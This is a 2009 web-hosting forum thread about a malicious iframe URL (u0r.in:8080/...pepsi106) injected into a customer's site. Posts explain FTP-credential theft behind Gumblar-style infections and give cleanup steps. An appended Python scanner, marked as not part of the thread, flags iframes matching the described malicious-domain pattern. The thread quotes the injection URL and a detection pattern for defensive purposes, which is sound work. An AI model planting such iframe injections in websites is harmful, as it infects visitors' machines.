Thread: weird line in customer website
-
07-20-2009, 05:33 PM #1Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,682
weird line in customer website
Today a customer sent me an email stating that this line
appeared in the html code of his website.
http://u0r.in:8080/ts/in.cgi?pepsi106
What is it? Is it a virus? a Trojan?
-
07-20-2009, 05:43 PM #2Web Hosting Guru
- Join Date
- May 2008
- Posts
- 340
I don't see the line you're referring to. When the URL is accessed it's redirecting to http://u7x.in:8080/index.php
Can you paste the contents of the script so that everyone can check it?
Twitter : http://twitter.com/eth1networks
Contact Us : support[at]eth1.in
-
07-20-2009, 05:47 PM #3Web Hosting Master
- Join Date
- Jun 2002
- Posts
- 1,682
The website was corrected and the line removed....
BTW, I found several references to that line in google
http://tinyurl.com/npn2rl
-
07-20-2009, 05:48 PM #4Junior Guru
- Join Date
- May 2009
- Location
- On a Speck!!!!!
- Posts
- 216
I just see a white page. Can you paste the code here?
-
07-20-2009, 05:52 PM #5Web Hosting Guru
- Join Date
- May 2008
- Posts
- 340
Just for clarification, the URL http://u0r.in:8080/ts/in.cgi?pepsi106 was included in the code?
Can you post the file ownership and permissions of the affected file?
Twitter : http://twitter.com/eth1networks
Contact Us : support[at]eth1.in
-
07-20-2009, 11:06 PM #6WHT Addict
- Join Date
- Apr 2003
- Location
- Earth
- Posts
- 156
Sounds like Gumblar.. change all passwords and virus/malware scan any machine that has accessed that account. Sounds like your customer's machine is infected.
-
07-21-2009, 02:40 AM #7Disabled
- Join Date
- Jun 2009
- Posts
- 126
It seems to be an issue with an attack on the customer's account due to insecure permissions.
Similar to iframe attacks.
-
07-21-2009, 02:46 AM #8Web Hosting Master
- Join Date
- Aug 2004
- Location
- Canada
- Posts
- 3,785
█ Tony B. - Chief Executive Officer
█ Hawk Host Inc. Proudly serving websites since 2004
█ Quality Shared and Cloud Hosting
█ PHP 5.2.x - PHP 8.1.X Support!
-
07-21-2009, 03:35 AM #9PING PONG
- Join Date
- May 2009
- Location
- SLASH ROOT
- Posts
- 867
Mostly it happens over FTP.
Check the FTP logs to find the source of injection. If you are using Active FTP, change to Passive.
Active is more vulnerable to data sniffing since it uses a standard port for communication. Don't store FTP passwords in FTP clients.
P.S: Also do set complex passwords for the accounts.
█ WebHostRepo.com
█ Linux | Windows | VPS | Cloud
█ Outsourced Technical Support since 2009
█ sales@webhostrepo.com
-
07-21-2009, 03:33 PM #10Junior Guru
- Join Date
- Oct 2008
- Location
- Chicago, IL
- Posts
- 222
It's not gumblar but it does happen the same way as gumblar and martuz - compromised FTP credentials.
One of the PCs that has FTP access to that site is infected. I know, everyone has an anti-virus program, but many AV companies were getting hit with so many new variants that they started using generic signatures. (Check out Commtouch's new report)
This opened the door to new viruses that were clever enough to evade detection.
These new virus strains work in one of three ways; they know where the username and passwords are stored in files for popular FTP programs, they use keyboard loggers and they also sniff FTP traffic. Since FTP transmits all data, including username and passwords, in plain text, sniffing for login credentials in an FTP stream is quite easy.
The "pepsi" and "cocacola" iframes are the new gumblar and martuz infections.
All PCs with FTP access to that site have to be scanned and cleaned with a new anti-virus program - one different from what's installed now because obviously the virus knows how to evade detection of the current AV.
Then, and only then, can the FTP passwords be changed and then have the site's files all scanned or just replaced with a known good back-up.
Thomas J. Raef
WeWatchYourWebsite - so you don't have to!
-
08-18-2009, 03:21 AM #11Disabled
- Join Date
- Aug 2009
- Posts
- 5
Anyone have doubt that it can be a virus or anything else?
-
08-18-2009, 03:35 AM #12New Member
- Join Date
- Dec 2005
- Location
- Istanbul / Turkiye
- Posts
- 3
-
08-18-2009, 04:12 AM #13Aspiring Evangelist
- Join Date
- Sep 2007
- Posts
- 369
-
08-18-2009, 04:22 AM #14Junior Guru
- Join Date
- Oct 2008
- Location
- Chicago, IL
- Posts
- 222
You should probably start a new thread for this. Your customer's website has been infected.
These types of infections (3 character domain, then the TLD of either: ru, hk, in or tw, followed by :8080 and some string) have usually been the result of compromised FTP credentials.
Your customer should have everyone with FTP access to their site (including you if you have FTP access to their site) install a new anti-virus program and scan and clean every PC with FTP access to that site.
The reason is that the virus that steals the FTP credentials already knows how to evade detection of the currently installed anti-virus program, so you need to use something different. If you don't do this, your customer's site will just get hacked again and again.
After cleaning all PCs with FTP access, you must change all FTP passwords.
Then you can either restore the site with a known, clean version, or download the entire site to a newly cleaned PC, scan all the files for the above line (it will appear in iframe tags) and remove the malscript.
These steps must be followed in the order listed. Otherwise your customer will just get hacked again.
Thomas J. Raef
WeWatchYourWebsite - so you don't have to!
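Added example, not part of the original thread: a Python scanner for the file check described in post #14, flagging iframe tags whose URL has a 3-character domain, a TLD of ru, hk, in or tw, and port 8080. The function names, the list of file extensions and the sample page are assumptions of this example; the flagged URL in the sample is the one quoted in post #1.

```python
import re
from pathlib import Path

# Host shape described in post #14: 3-character label, TLD ru/hk/in/tw, port 8080.
SUSPECT_URL = re.compile(
    r"https?://[a-z0-9]{3}\.(?:ru|hk|in|tw):8080/[^\s\"'<>]*", re.IGNORECASE)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SCAN_SUFFIXES = {".html", ".htm", ".php", ".js", ".tpl"}  # assumed file types


def find_injected_iframes(text):
    """Return (line_number, url) for each iframe tag that holds a suspect URL."""
    hits = []
    for tag in IFRAME.finditer(text):
        url = SUSPECT_URL.search(tag.group(0))
        if url:
            line_no = text.count("\n", 0, tag.start()) + 1
            hits.append((line_no, url.group(0)))
    return hits


def scan_tree(root):
    """Walk a downloaded copy of the site and map relative path -> hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = find_injected_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed sample page: one ordinary iframe and one matching the pattern.
SAMPLE = """<html><body>
<iframe src="https://maps.example.com/embed?id=1"></iframe>
<p>Welcome</p>
<iframe src="http://u0r.in:8080/ts/in.cgi?pepsi106"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for line_no, url in find_injected_iframes(SAMPLE):
        print(f"line {line_no}: {url}")
```

This matches only literal iframe tags; an injection written out by obfuscated script would need a separate check, and a diff against a known clean backup remains the more reliable comparison.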